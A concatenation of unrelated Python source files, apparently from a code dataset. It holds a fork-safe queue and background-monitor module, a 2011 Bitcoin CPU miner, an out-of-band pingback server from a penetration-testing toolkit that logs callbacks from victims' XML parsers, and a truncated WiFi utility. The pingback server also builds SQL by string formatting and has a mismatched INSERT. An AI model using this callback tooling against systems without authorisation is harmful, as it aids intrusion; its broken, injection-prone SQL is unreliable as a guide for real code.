class ForkQueue(_ForkSafeThreadSyncObject):
def __init__(self):
super(ForkQueue, self).__init__(TrQueue)
def get(self, *args, **kwargs):
self._create()
return self._sync.get(*args, **kwargs)
def put(self, *args, **kwargs):
self._create()
return self._sync.put(*args, **kwargs)
def empty(self):
if not self._sync:
return True
self._create()
return self._sync.empty()
def full(self):
if not self._sync:
return False
self._create()
return self._sync.full()
def close(self):
if not self._sync:
return
self._create()
return self._sync.close()
class ThreadCalls(object):
def __init__(self):
self._queue = ForkQueue()
self._thread = Thread(target=self._worker)
self._thread.daemon = True
self._thread.start()
def is_alive(self):
return bool(self._thread) and self._thread.is_alive()
def apply_async(self, func, args=None):
if not func:
return False
self._queue.put((func, args))
return True
def close(self, timeout=5.):
t = self._thread
if not t:
return
try:
# push something into queue so it knows this is the end
self._queue.put(None)
# wait fot thread it should not take long, so we have a 5 second timeout
# the background thread itself is doing nothing but push into a queue, so it should not take long
t.join(timeout=timeout)
except BaseException: # noqa
pass
# mark thread is done
self._thread = None
def _worker(self):
while True:
try:
request = self._queue.get(block=True, timeout=1.0)
if not request:
break
except Empty:
continue
# noinspection PyBroadException
try:
if request[1]:
request[0](*request[1])
else:
request[0]()
except Exception:
pass
self._thread = None
class SingletonThreadPool(object):
__thread_pool = None
__thread_pool_pid = None
@classmethod
def get(cls):
if os.getpid() != cls.__thread_pool_pid:
cls.__thread_pool = ThreadCalls()
cls.__thread_pool_pid = os.getpid()
return cls.__thread_pool
@classmethod
def clear(cls):
if cls.__thread_pool:
cls.__thread_pool.close()
cls.__thread_pool = None
cls.__thread_pool_pid = None
@classmethod
def is_active(cls):
return cls.__thread_pool and cls.__thread_pool_pid == os.getpid() and cls.__thread_pool.is_alive()
class SafeQueue(object):
"""
Many writers Single Reader multiprocessing safe Queue
"""
__thread_pool = SingletonThreadPool()
def __init__(self, *args, **kwargs):
self._reader_thread = None
self._reader_thread_started = False
# Fix the python Queue and Use SimpleQueue write so it uses a single OS write,
# making it atomic message passing
self._q = SimpleQueue(*args, **kwargs)
# noinspection PyBroadException
try:
# noinspection PyUnresolvedReferences,PyProtectedMember
self._q._writer._send_bytes = partial(SafeQueue._pipe_override_send_bytes, self._q._writer)
except Exception:
pass
self._internal_q = None
self._q_size = [] # list of PIDs we pushed, so this is atomic
def empty(self):
return self._q.empty() and (not self._internal_q or self._internal_q.empty())
def is_pending(self):
# check if we have pending requests to be pushed (it does not mean they were pulled)
# only call from main put process
return self._get_q_size_len() > 0
def close(self, event, timeout=3.0):
# wait until all pending requests pushed
tic = time()
pid = os.getpid()
prev_q_size = self._get_q_size_len(pid)
while self.is_pending():
if event:
event.set()
if not self.__thread_pool.is_active():
break
sleep(0.1)
# timeout is for the maximum time to pull a single object from the queue,
# this way if we get stuck we notice quickly and abort
if timeout and (time()-tic) > timeout:
if prev_q_size == self._get_q_size_len(pid):
break
else:
prev_q_size = self._get_q_size_len(pid)
tic = time()
def get(self, *args, **kwargs):
return self._get_internal_queue(*args, **kwargs)
def batch_get(self, max_items=1000, timeout=0.2, throttle_sleep=0.1):
buffer = []
timeout_count = int(timeout/throttle_sleep)
empty_count = timeout_count
while len(buffer) < max_items:
while not self.empty() and len(buffer) < max_items:
try:
buffer.append(self._get_internal_queue(block=False))
empty_count = 0
except Empty:
break
empty_count += 1
if empty_count > timeout_count or len(buffer) >= max_items:
break
sleep(throttle_sleep)
return buffer
def put(self, obj):
# not atomic when forking for the first time
# GIL will make sure it is atomic
self._q_size.append(os.getpid())
# make sure the block put is done in the thread pool i.e. in the background
obj = pickle.dumps(obj)
if BackgroundMonitor.get_at_exit_state():
self._q_put(obj)
return
self.__thread_pool.get().apply_async(self._q_put, args=(obj, ))
def _get_q_size_len(self, pid=None):
pid = pid or os.getpid()
return len([p for p in self._q_size if p == pid])
def _q_put(self, obj):
try:
self._q.put(obj)
except BaseException:
# make sure we zero the _q_size of the process dies (i.e. queue put fails)
self._q_size = []
raise
pid = os.getpid()
# GIL will make sure it is atomic
# pop the First "counter" that is ours (i.e. pid == os.getpid())
p = None
while p != pid:
p = self._q_size.pop()
def _init_reader_thread(self):
if not self._internal_q:
self._internal_q = ForkQueue()
if not self._reader_thread or not self._reader_thread.is_alive():
# read before we start the thread
self._reader_thread = Thread(target=self._reader_daemon)
self._reader_thread.daemon = True
self._reader_thread.start()
# if we have waiting results
# wait until thread is up and pushed some results
while not self._reader_thread_started:
sleep(0.2)
# just in case make sure we pulled some stuff if we had any
# todo: wait until a queue is not empty, but for some reason that might fail
sleep(1.0)
def _get_internal_queue(self, *args, **kwargs):
self._init_reader_thread()
obj = self._internal_q.get(*args, **kwargs)
# deserialize
return pickle.loads(obj)
def _reader_daemon(self):
self._reader_thread_started = True
# pull from process queue and push into thread queue
while True:
# noinspection PyBroadException
try:
obj = self._q.get()
if obj is None:
break
except Exception:
break
self._internal_q.put(obj)
@staticmethod
def _pipe_override_send_bytes(self, buf):
n = len(buf)
# For wire compatibility with 3.2 and lower
header = struct.pack("!i", n)
# Issue #20540: concatenate before sending, to avoid delays due
# to Nagle's algorithm on a TCP socket.
# Also note we want to avoid sending a 0-length buffer separately,
# to avoid "broken pipe" errors if the other end closed the pipe.
self._send(header + buf)
class SafeEvent(object):
__thread_pool = SingletonThreadPool()
def __init__(self):
self._event = ProcessEvent()
def is_set(self):
return self._event.is_set()
def set(self):
if not BackgroundMonitor.is_subprocess_enabled() or BackgroundMonitor.is_subprocess_alive():
self._event.set()
# SafeEvent.__thread_pool.get().apply_async(func=self._event.set, args=())
def clear(self):
return self._event.clear()
def wait(self, timeout=None):
return self._event.wait(timeout=timeout)
class SingletonLock(AbstractContextManager):
_instances = []
def __init__(self):
self._lock = None
SingletonLock._instances.append(self)
def acquire(self, *args, **kwargs):
self.create()
return self._lock.acquire(*args, **kwargs)
def release(self, *args, **kwargs):
if self._lock is None:
return None
return self._lock.release(*args, **kwargs)
def create(self):
if self._lock is None:
self._lock = Lock()
@classmethod
def instantiate(cls):
for i in cls._instances:
i.create()
def __enter__(self):
"""Return `self` upon entering the runtime context."""
self.acquire()
return self
def __exit__(self, exc_type, exc_value, traceback):
"""Raise any exception triggered within the runtime context."""
# Do whatever cleanup.
self.release()
class BackgroundMonitor(object):
# If we will need multiple monitoring contexts (i.e. subprocesses) this will become a dict
_main_process = None
_main_process_proc_obj = None
_main_process_task_id = None
_parent_pid = None
_sub_process_started = None
_at_exit = False
_instances = {} # type: Dict[int, List[BackgroundMonitor]]
def __init__(self, task, wait_period):
self._event = ForkEvent()
self._done_ev = ForkEvent()
self._start_ev = ForkEvent()
self._task_pid = os.getpid()
self._thread = None
self._thread_pid = None
self._wait_timeout = wait_period
self._subprocess = None if task.is_main_task() else False
self._task_id = task.id
self._task_obj_id = id(task.id)
def start(self):
if not self._thread:
self._thread = True
self._event.clear()
self._done_ev.clear()
if self._subprocess is False:
# start the thread we are in threading mode.
self._start()
else:
# append to instances
if self not in self._get_instances():
self._get_instances().append(self)
def wait(self, timeout=None):
if not self._done_ev:
return
if not self.is_subprocess_mode() or self.is_subprocess_mode_and_parent_process():
self._done_ev.wait(timeout=timeout)
def _start(self):
# if we already started do nothing
if isinstance(self._thread, Thread):
if self._thread_pid == os.getpid():
return
self._thread_pid = os.getpid()
self._thread = Thread(target=self._daemon)
self._thread.daemon = True
self._thread.start()
def stop(self):
if not self._thread:
return
if not self._is_subprocess_mode_and_not_parent_process() and (
not self.is_subprocess_mode() or self.is_subprocess_alive()):
self._event.set()
if isinstance(self._thread, Thread):
try:
self._get_instances().remove(self)
except ValueError:
pass
self._thread = False
def daemon(self):
while True:
if self._event.wait(self._wait_timeout):
break
self._daemon_step()
def _daemon(self):
self._start_ev.set()
self.daemon()
self.post_execution()
self._thread = False
def post_execution(self):
self._done_ev.set()
def set_subprocess_mode(self):
# called just before launching the daemon in a subprocess
if not self._subprocess:
self._subprocess = True
if not isinstance(self._done_ev, SafeEvent):
self._done_ev = SafeEvent()
if not isinstance(self._start_ev, SafeEvent):
self._start_ev = SafeEvent()
if not isinstance(self._event, SafeEvent):
self._event = SafeEvent()
def _daemon_step(self):
pass
@classmethod
def start_all(cls, task, wait_for_subprocess=True):
# noinspection PyProtectedMember
execute_in_subprocess = task._report_subprocess_enabled
if not execute_in_subprocess:
for d in BackgroundMonitor._instances.get(id(task.id), []):
d._start()
elif not BackgroundMonitor._main_process:
cls._parent_pid = os.getpid()
cls._sub_process_started = SafeEvent()
cls._sub_process_started.clear()
cls._main_process_task_id = task.id
# setup
for d in BackgroundMonitor._instances.get(id(task.id), []):
d.set_subprocess_mode()
# todo: solve for standalone spawn subprocess
if ForkContext is not None and isinstance(get_context(), ForkContext):
cls.__start_subprocess_forkprocess(task_obj_id=id(task.id))
else:
cls.__start_subprocess_os_fork(task_obj_id=id(task.id))
# wait until subprocess is up
if wait_for_subprocess:
cls._sub_process_started.wait()
@classmethod
def __start_subprocess_os_fork(cls, task_obj_id):
process_args = (task_obj_id, cls._sub_process_started, os.getpid())
BackgroundMonitor._main_process = os.fork()
# check if we are the child process
if BackgroundMonitor._main_process == 0:
# update to the child process pid
BackgroundMonitor._main_process = os.getpid()
BackgroundMonitor._main_process_proc_obj = psutil.Process(BackgroundMonitor._main_process)
cls._background_process_start(*process_args)
# force to leave the subprocess
leave_process(0)
return
# update main process object (we are now in the parent process, and we update on the child's subprocess pid)
# noinspection PyBroadException
try:
BackgroundMonitor._main_process_proc_obj = psutil.Process(BackgroundMonitor._main_process)
except Exception:
# if we fail for some reason, do not crash, switch to thread mode when you can
BackgroundMonitor._main_process_proc_obj = None
@classmethod
def __start_subprocess_forkprocess(cls, task_obj_id):
_main_process = Process(
target=cls._background_process_start,
args=(task_obj_id, cls._sub_process_started, os.getpid())
)
_main_process.daemon = True
# Hack allow to create daemon subprocesses (even though python doesn't like it)
un_daemonize = False
# noinspection PyBroadException
try:
from multiprocessing import current_process
if current_process()._config.get('daemon'): # noqa
un_daemonize = current_process()._config.get('daemon') # noqa
current_process()._config['daemon'] = False # noqa
except BaseException:
pass
# try to start the background process, if we fail retry again, or crash
for i in range(4):
try:
_main_process.start()
break
except BaseException:
if i < 3:
sleep(1)
continue
raise
BackgroundMonitor._main_process = _main_process.pid
BackgroundMonitor._main_process_proc_obj = psutil.Process(BackgroundMonitor._main_process)
if un_daemonize:
# noinspection PyBroadException
try:
from multiprocessing import current_process
current_process()._config['daemon'] = un_daemonize # noqa
except BaseException:
pass
@classmethod
def _background_process_start(cls, task_obj_id, event_start=None, parent_pid=None):
# type: (int, Optional[SafeEvent], Optional[int]) -> None
is_debugger_running = bool(getattr(sys, 'gettrace', None) and sys.gettrace())
# make sure we update the pid to our own
cls._main_process = os.getpid()
cls._main_process_proc_obj = psutil.Process(cls._main_process)
# restore original signal, this will prevent any deadlocks
# Do not change the exception we need to catch base exception as well
# noinspection PyBroadException
try:
from ... import Task
# make sure we do not call Task.current_task() it will create a Task object for us on a subprocess!
# noinspection PyProtectedMember
if Task._has_current_task_obj():
# noinspection PyProtectedMember
Task.current_task()._remove_at_exit_callbacks()
except: # noqa
pass
# if a debugger is running, wait for it to attach to the subprocess
if is_debugger_running:
sleep(3)
instances = BackgroundMonitor._instances.get(task_obj_id, [])
# launch all the threads
for d in instances:
d._start()
if cls._sub_process_started:
cls._sub_process_started.set()
if event_start:
event_start.set()
# wait until we are signaled
for i in instances:
# DO NOT CHANGE, we need to catch base exception, if the process gte's killed
try:
while i._thread is None or (i._thread and i._thread.is_alive()):
# thread is still not up
if i._thread is None:
sleep(0.1)
continue
# noinspection PyBroadException
try:
p = psutil.Process(parent_pid)
parent_alive = p.is_running() and p.status() != psutil.STATUS_ZOMBIE
except Exception:
parent_alive = False
# if parent process is not here we should just leave!
if not parent_alive:
return
# DO NOT CHANGE, we need to catch base exception, if the process gte's killed
try:
# timeout so we can detect if the parent process got killed.
i._thread.join(timeout=30.)
except: # noqa
break
except: # noqa
pass
# we are done, leave process
return
def is_alive(self):
if not self.is_subprocess_mode():
return isinstance(self._thread, Thread) and self._thread.is_alive()
if self.get_at_exit_state():
return self.is_subprocess_alive() and self._thread
return self.is_subprocess_alive() and \
self._thread and \
self._start_ev.is_set() and \
not self._done_ev.is_set()
@classmethod
def _fast_is_subprocess_alive(cls):
if not cls._main_process_proc_obj:
return False
# we have to assume the process actually exists, so we optimize for
# just getting the object and status.
# noinspection PyBroadException
try:
return cls._main_process_proc_obj.is_running() and \
cls._main_process_proc_obj.status() != psutil.STATUS_ZOMBIE
except Exception:
return False
@classmethod
def is_subprocess_alive(cls, task=None):
if not cls._main_process or (task and cls._main_process_task_id != task.id):
return False
# noinspection PyBroadException
try:
p = psutil.Process(cls._main_process)
return p.is_running() and p.status() != psutil.STATUS_ZOMBIE
except Exception:
current_pid = cls._main_process
if not current_pid:
return False
try:
parent = psutil.Process(cls._parent_pid)
except psutil.Error:
# could not find parent process id
return
for child in parent.children(recursive=True):
# kill ourselves last (if we need to)
if child.pid == current_pid:
return child.is_running() and child.status() != psutil.STATUS_ZOMBIE
return False
def is_subprocess_mode(self):
return self._subprocess is not False and \
bool(self._main_process) and self._task_id == self._main_process_task_id
def _get_instances(self):
return self._instances.setdefault(self._task_obj_id, [])
def _is_subprocess_mode_and_not_parent_process(self):
return self.is_subprocess_mode() and self._parent_pid != os.getpid()
def is_subprocess_mode_and_parent_process(self):
return self.is_subprocess_mode() and self._parent_pid == os.getpid()
def _is_thread_mode_and_not_main_process(self):
if self.is_subprocess_mode():
return False
from ... import Task
# noinspection PyProtectedMember
return Task._Task__is_subprocess()
@classmethod
def is_subprocess_enabled(cls, task=None):
return bool(cls._main_process) and (not task or task.id == cls._main_process_task_id)
@classmethod
def clear_main_process(cls, task):
if BackgroundMonitor._main_process_task_id != task.id:
return
cls.wait_for_sub_process(task)
BackgroundMonitor._main_process = None
BackgroundMonitor._main_process_proc_obj = None
BackgroundMonitor._main_process_task_id = None
BackgroundMonitor._parent_pid = None
BackgroundMonitor._sub_process_started = None
BackgroundMonitor._instances = {}
SingletonThreadPool.clear()
@classmethod
def wait_for_sub_process(cls, task, timeout=None):
if not cls.is_subprocess_enabled(task=task):
return
for d in BackgroundMonitor._instances.get(id(task.id), []):
d.stop()
tic = time()
while cls.is_subprocess_alive(task=task) and (not timeout or time()-tic < timeout):
sleep(0.03)
@classmethod
def set_at_exit_state(cls, state=True):
cls._at_exit = bool(state)
@classmethod
def get_at_exit_state(cls):
return cls._at_exit
def leave_process(status=0):
# type: (int) -> None
"""
Exit current process with status-code (status)
:param status: int exit code
"""
try:
sys.exit(status or 0)
except: # noqa
# ipython/jupyter notebook will not allow to call sys.exit
# we have to call the low level function
os._exit(status or 0) # noqa
|
pyminer.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 2017
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
py-collaborator-server.py | #!/usr/bin/python3
from http.server import BaseHTTPRequestHandler,HTTPServer
import urllib
import re
import sys
import ssl
import json
import string
import random
import socket
import pymysql
import argparse
import datetime
import threading
from Database import Database
from Logger import *
VERSION = '0.1'
#
# CONFIGURE THE BELOW VARIABLES
#
# Must point to JSON file containing configuration mentioned in `config` dictionary below.
# One can either supply that configuration file, or let the below variable empty and fill the `config`
# dictionary instead.
CONFIGURATION_FILE = 'config.json'
config = {
'debug' : '',
'listen' : '0.0.0.0',
'pingback-host': '',
'server-remote-addr': '',
'listen-on-ports' : (80, 443, 8080),
# You can generate it using Let's Encrypt wildcard certificate.
'server-ca-cert' : '',
"server-key-file": '',
'mysql-host': '',
'mysql-user': '',
'mysql-pass': '',
'mysql-database': '',
'exclude-pingbacks-from-clients' : [],
}
databaseInstance = None
def generateRandomId():
randomized = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(50))
return "xxx" + randomized + "yyy"
class PingbackServer(BaseHTTPRequestHandler):
method = ''
def __init__(self, *args, **kwargs):
self.server_version = 'nginx'
try:
BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
except Exception as e:
if config['debug']:
Logger.dbg('Failure along __init__ of BaseHTTPRequestHandler: {}'.format(str(e)))
raise
#Logger.info('Previously catched pingbacks:\n--------------------------\n')
#self.presentAtStart()
def presentAtStart(self):
rows = databaseInstance.query(f'SELECT * FROM calledbacks')
if not rows:
return
for row in rows:
request = databaseInstance.query(f"SELECT * FROM requests WHERE id = {row['requestid']}")
Logger.info(row['request'])
def log_message(self, format, *args):
return
def extractUuid(self):
uuidRex = re.compile(r'(\bxxx[a-z0-9]{50}yyy\b)', re.I|re.M)
if 'xxx' in self.path and 'yyy' in self.path:
# Request path
m = uuidRex.search(self.path)
if m:
return ('URL path', m.group(1))
# Request headers
for h in self.headers:
value = self.headers[h]
if ('xxx' not in value or 'yyy' not in value):
continue
m = uuidRex.search(value)
if m:
return (f'Header: {h}', m.group(1))
return ('', '')
def presentPingbackedRequest(self, where, uuid, record):
fmt = '%Y-%m-%d %H:%M:%S'
now = datetime.datetime.utcnow().strftime(fmt)
delay = str(datetime.datetime.utcnow() - datetime.datetime.strptime(record['sent'], fmt))
req = '\r\n'.join([f'\t{x}' for x in record['request'].split('\r\n')])
req2 = '\r\n'.join([f'\t{x}' for x in PingbackServer.requestToString(self).split('\r\n')])
try:
reverse = socket.gethostbyaddr(self.client_address[0])[0]
except:
reverse = self.client_address[0]
message = f'''
-------------------------------------------------------------------------------------
Issue: Pingback {record['id']} ({self.command} {self.path} ) found in request's {where}
Where payload was put: {record['whereput']}
Contacting host: {reverse}
Tried to reach vhost: {self.headers['Host']}:{self.server.server_port}
Issue detail:
Our pingback-server was contacted by ({self.client_address[0]}:{self.client_address[1]}) after a delay of ({delay}):
Original request where this pingback was inserted:
---
{req}
Request that was sent to us in return:
---
{req2}
The payload was sent at ({record['sent']}) and received on ({now}).
-------------------------------------------------------------------------------------
'''
Logger._out(message)
return message
def savePingback(self, requestid, message):
query = 'INSERT INTO calledbacks(id, requestid, uuid, whereput) VALUES(%d, %d, "%s")' % (\
0, requestid, message)
Logger.dbg(f'Saving pingback: (requestid={str(requestid)})')
Logger.dbg(query)
databaseInstance.insert(query)
def checkUuid(self, where, uuid):
if not (uuid.startswith('xxx') and uuid.endswith('yyy')):
return
for a in uuid:
if a not in string.ascii_lowercase + string.digits:
return
out = databaseInstance.query(f'SELECT * FROM requests WHERE uuid = "{uuid}"')
if out:
message = self.presentPingbackedRequest(where, uuid, out[0])
self.savePingback(out[0]['id'], message)
def send_header(self, name, value):
if name == 'Server':
return super(PingbackServer, self).send_header(name, 'nginx')
return super(PingbackServer, self).send_header(name, value)
def _set_response(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
@staticmethod
def requestToString(request):
headers = '\r\n'.join(['{}: {}'.format(k, v) for k, v in request.headers.items()])
out = '{} {} {}\r\n{}'.format(request.command, request.path, request.request_version, headers)
return out
def do_GET(self):
if not (self.client_address[0] in config['exclude-pingbacks-from-clients']):
if config['debug']:
Logger.dbg('--------------------------\nIncoming HTTP request from {}: {} {}'.format(
self.client_address[0],
self.method,
self.path[:25]
))
Logger.dbg(PingbackServer.requestToString(self) + '\n')
(where, uuid) = PingbackServer.extractUuid(self)
if uuid:
self.checkUuid(where, uuid)
else:
Logger.dbg('Skipping Client ({}) as it was excluded in config file.'.format(self.client_address[0]))
self._set_response()
self.wfile.write(b'Ok')
do_POST = do_GET
do_DELETE = do_GET
do_PUT = do_GET
do_OPTIONS = do_GET
do_HEAD = do_GET
do_TRACE = do_GET
do_CONNECT = do_GET
do_PATCH = do_GET
def parseOptions(argv):
global config
print('''
:: Cracking the Lens pingback responding server
Responds to every Out-of-band request correlating them along the way
Mariusz Banach / mgeeky '16-18, <mb@binary-offensive.com>
''')
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
parser.add_argument('-l', '--listen', default='0.0.0.0', help = 'Specifies interface address to bind the HTTP server on / listen on. Default: 0.0.0.0 (all interfaces)')
parser.add_argument('-p', '--port', metavar='PORT', default='80', type=int, help='Specifies the port to listen on. Default: 80')
parser.add_argument('-r', '--rhost', metavar='HOST', default=config['server-remote-addr'], help='Specifies attackers host address where the victim\'s XML parser should refer while fetching external entities')
parser.add_argument('--mysql-host', metavar='MYSQLHOST', default='127.0.0.1', type=str, help='Specifies the MySQL hostname. Defalut: 127.0.0.1:3306')
parser.add_argument('--mysql-user', metavar='MYSQLUSER', default='root', type=str, help='Specifies the MySQL user, that will be able to create database, tables, select/insert records and so on. Default: root')
parser.add_argument('--mysql-pass', metavar='MYSQLPASS', type=str, help='Specifies the MySQL password')
parser.add_argument('-d', '--debug', action='store_true', help='Display debug output.')
args = parser.parse_args()
config['debug'] = args.debug
config['listen'] = args.listen
config['port'] = int(args.port)
config['server-remote-addr'] = args.rhost
port = int(args.port)
if port < 1 or port > 65535:
Logger.err("Invalid port number. Must be in <1, 65535>")
sys.exit(-1)
try:
if not args.mysql_host or not args.mysql_port or not args.mysql_user or not args.mysql_pass:
Logger.warn("You shall specify all needed MySQL connection data either via program options or config file.")
#sys.exit(-1)
else:
config['mysql-host'] = args.mysql_host
config['mysql-user'] = args.mysql_user
config['mysql-pass'] = args.mysql_pass
except:
Logger.warn("You shall specify all needed MySQL connection data either via program options or config file.")
return args
def connectToDatabase():
global databaseInstance
databaseInstance = Database()
return databaseInstance.connection(config['mysql-host'], config['mysql-user'], config['mysql-pass'])
def initDatabase():
initQueries = (
f"CREATE DATABASE IF NOT EXISTS {config['mysql-database']}",
f'''CREATE TABLE IF NOT EXISTS {config['mysql-database']}.requests (
id integer AUTO_INCREMENT,
sent text NOT NULL,
uuid text NOT NULL,
desthost text NOT NULL,
pingback text NOT NULL,
whereput text NOT NULL,
request text NOT NULL,
PRIMARY KEY (id)) ENGINE=MyISAM AUTO_INCREMENT=1 DEFAULT CHARSET=utf8;''',
f'''CREATE TABLE IF NOT EXISTS {config['mysql-database']}.calledbacks (
id integer AUTO_INCREMENT,
requestid integer NOT NULL,
request text NOT NULL,
PRIMARY KEY (id),
FOREIGN KEY(requestid) REFERENCES requests(id)) ENGINE=MyISAM AUTO_INCREMENT=1 DEFAULT CHARSET=utf8;''',
)
for query in initQueries:
databaseInstance.query(query)
databaseInstance.databaseConnection.select_db(config['mysql-database'])
Logger.ok('Database initialized.')
def fetchRhost():
global config
config['server-remote-addr'] = socket.gethostbyname(socket.gethostname())
def main(argv):
global config
fetchRhost()
opts = parseOptions(argv)
if not opts:
Logger.err('Options parsing failed.')
return False
if CONFIGURATION_FILE:
config.update(json.loads(open(CONFIGURATION_FILE).read()))
if not connectToDatabase():
Logger.err('Could not connect to database: {}'.format(config['mysql-host']))
sys.exit(-1)
initDatabase()
Logger.dbg('Local host\'s IP address (RHOST) set to: {}'.format(config['server-remote-addr']))
for port in config['listen-on-ports']:
try:
server = HTTPServer((config['listen'], port), PingbackServer)
server.server_version = 'nginx'
except OSError as e:
Logger.err(f'Could not server on port {port}: {str(e)}')
Logger.warn('Skipping...')
continue
#return
if port == 443:
try:
server.socket = ssl.wrap_socket(server.socket, keyfile = config['server-key-file'], certfile = config['server-ca-cert'], server_side = True)
except ssl.SSLError as e:
Logger.warn(f'Could not serve HTTPS due to SSL error: {str(e)}')
Logger.warn('Skipping...')
continue
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
Logger.ok('Serving HTTP server on: ("{}", {})'.format(
config['listen'], port)
)
try:
Logger.info('Entering infinite serving loop.')
while True:
pass
except KeyboardInterrupt:
pass
if __name__ == '__main__':
main(sys.argv)
|
WiFiDevice.py | # Copyright (c) 2019, the rf_sensor authors (see AUTHORS.txt)
# Licensed under the BSD 3-clause license (see LICENSE.txt)
#!/usr/bin/env python3
#****************************************************
# Class for manipulating wifi interfaces
# Input:
# -i, iface: wireless interface name
# -c, channels: channels to survey
# -f, filter: filter applied to received packets
# Variables:
# self.tcpdump_process is the process acquiring tcpdump data
# to read use self.tcpdumpo_process.stdout.readline()
#****************************************************
#from __future__ import print_function
import sys, os
import subprocess, multiprocessing
import datetime, time
import numpy as np
def execute_retry(cmd, max_counter = 10):
counter = 0
print("{:40s} ".format(cmd))
while os.system(cmd):
counter += 1
print("\n[{:02d}/{:02d}] {:s} Failed".format(counter, max_counter, cmd))
